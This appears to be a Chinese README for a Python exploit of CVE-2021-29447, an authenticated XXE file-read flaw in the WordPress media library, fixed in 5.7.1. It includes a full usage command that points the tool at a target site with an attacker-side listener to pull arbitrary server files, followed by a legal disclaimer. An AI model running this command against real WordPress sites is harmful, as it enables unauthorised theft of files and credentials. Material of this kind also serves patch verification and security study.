利用 WordPress 媒体库 XML 中需认证的外部实体注入(XXE)漏洞来窃取文件。
该漏洞已在 WordPress 5.7.1 中修复。
需要有效的 WordPress 凭据才能与媒体库交互。
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
脚本将询问文件路径并返回所请求的文件。
灵感来自 David Utón (M3n0sD0n4ld) ExploitDB 的脚本。
未经事先双方同意,使用此工具攻击目标属于违法行为。遵守所有适用的地方、州和联邦法律是最终用户的责任。开发者不承担任何责任,也不对因使用本程序造成的任何滥用或损害负责。仅限教育目的使用。
此脚本根据 MIT 许可证 发布。